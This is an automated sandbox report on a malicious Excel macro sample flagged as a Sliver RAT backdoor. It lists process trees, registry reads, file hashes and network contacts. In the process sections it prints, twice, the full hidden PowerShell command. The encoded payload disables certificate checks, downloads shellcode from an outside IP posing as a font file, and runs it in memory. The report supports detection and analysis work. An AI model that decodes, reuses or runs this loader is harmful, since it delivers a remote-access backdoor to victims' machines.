Malware Analysis Report

2024-11-15 05:21

Sample ID 241110-1ptwcavqd1
Target f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750
SHA256 f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750
Tags
macro macro_on_action sliver backdoor discovery execution trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750

Threat Level: Known bad

The file f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750 was found to be: Known bad.

Malicious Activity Summary

macro macro_on_action sliver backdoor discovery execution trojan

Process spawned unexpected child process

SliverRAT

Sliver family

Sliver RAT v2

Office macro that triggers on suspicious action

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

System Location Discovery: System Language Discovery

Office loads VBA resources, possible macro or embedded object present

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 21:49

Signatures

Office macro that triggers on suspicious action

macro macro_on_action
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 21:49

Reported

2024-11-10 21:51

Platform

win7-20241023-en

Max time kernel

14s

Max time network

17s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750.xls

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

Sliver RAT v2

Description Indicator Process Target
N/A N/A N/A N/A

Sliver family

sliver

SliverRAT

trojan backdoor sliver

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2156 wrote to memory of 2668 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2156 wrote to memory of 2668 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2156 wrote to memory of 2668 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2156 wrote to memory of 2668 N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 2840 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2668 wrote to memory of 2840 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2668 wrote to memory of 2840 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2668 wrote to memory of 2840 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2840 wrote to memory of 2288 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2840 wrote to memory of 2288 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2840 wrote to memory of 2288 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2840 wrote to memory of 2288 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750.xls

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mijvygvr.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB78D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB78C.tmp"

Network

Country Destination Domain Proto
CH 194.182.164.149:8080 194.182.164.149 tcp

Files

memory/2156-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2156-1-0x000000007281D000-0x0000000072828000-memory.dmp

memory/2156-9-0x0000000006520000-0x0000000006620000-memory.dmp

memory/2156-8-0x0000000006520000-0x0000000006620000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\mijvygvr.cmdline

MD5 6d5592b497b6e98a2d708b6ca0b2b03c
SHA1 bcaf6dd8a4ab750316b33c6844ab2dee9d11e028
SHA256 fb874493bd3bdd2f41a6b4a7a8a03635ac7af8566ce9122b3c52f459fa4144f9
SHA512 853db144173f793b2153ffc147d7b1d5664210c33c5457fc5cfd462a6d2a0d39c1faed305cc4392ea4abd0a61fe600715d884c7971148757c4025e2365b95167

\??\c:\Users\Admin\AppData\Local\Temp\mijvygvr.0.cs

MD5 f4dd5c682eb7b3b679f084261bfc7c4c
SHA1 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA256 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA512 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

\??\c:\Users\Admin\AppData\Local\Temp\CSCB78C.tmp

MD5 c47ff82a5932c232598a815a60178822
SHA1 9b8094368d382bbfdd9cbd7e20700fe3127f5893
SHA256 1282ea0e8dee8e7b23a7f6c321ffad1f00ab2b2dcb8b0065b0926d3351b5dcc3
SHA512 876da2690c0be06d5276822b8b9192ea9e79fff45a681f5a52fbbae973e10189fd6c4a6fcfc774345b47019edd1ac9d86058cacaec04607d0231a92661a5ea5d

C:\Users\Admin\AppData\Local\Temp\RESB78D.tmp

MD5 a6e93bded30f1d08d93ada9b9dcc635d
SHA1 70a19de7529fdd3890aa61593c3740e2a7de0c34
SHA256 80f77a12e822907f6fba5958b99cb5db08716db43a7623ef2b0340e81da18001
SHA512 38d4214b6c9271ab8e09a3c771049720bd2cf2279ff3c40aaa4b2f0564bb4c897dd8e48c1a2fb6b6028cfbbc1943735d82726ee14a4f407deb6c75d990626ab0

C:\Users\Admin\AppData\Local\Temp\mijvygvr.dll

MD5 67690e141a0648f29d9e43dcd5c1ea69
SHA1 28a1dbb751286185e24b85e5dfeaddd23a66c00a
SHA256 65190a9dcc89bd9f5ac6778ee2df1d9f94e29f4c254e59a55e4fa08589557c6b
SHA512 8b0bfb809d349042ebea31f6390a475eefd36e4c079358db65837f4ed0b438f70359229791a2062d3f92e4abf1c5eb5319f1aa6276fc4d3e33f1aaf1b2b17865

C:\Users\Admin\AppData\Local\Temp\mijvygvr.pdb

MD5 54b06d46d74260e0a2291dd86c9f10b3
SHA1 174fbcc8825cc334061e0206ae41da2dbbd25be3
SHA256 cd0d6d56c1a4579611ba20bbebc239572a45fa06e8ec065ae0752ac215b3a628
SHA512 21284050aedc9502a412384d89a21b540573b3767ab4143043312d91ed1733ca2c54c2b5c04aa40a1f019b2181f56d303936a6ced783355e226d22b5d57d7620

C:\Users\Admin\AppData\Local\Temp\CabC40C.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2156-43-0x000000007281D000-0x0000000072828000-memory.dmp

memory/2156-44-0x0000000006520000-0x0000000006620000-memory.dmp

memory/2668-45-0x00000000069F0000-0x000000000746E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 21:49

Reported

2024-11-10 21:51

Platform

win10v2004-20241007-en

Max time kernel

57s

Max time network

60s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Sliver RAT v2

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sliver family

sliver

SliverRAT

trojan backdoor sliver

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\f25f3770c942e387de418ecc50dd1ac49c713406c77d833d21f3603b54290750.xls"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xpvmsg0o\xpvmsg0o.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79C4.tmp" "c:\Users\Admin\AppData\Local\Temp\xpvmsg0o\CSC10AE9CB6BFF74E9F9A7E3E47CB7F897F.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
CH 194.182.164.149:8080 194.182.164.149 tcp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 149.164.182.194.in-addr.arpa udp
CH 194.182.164.149:443 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
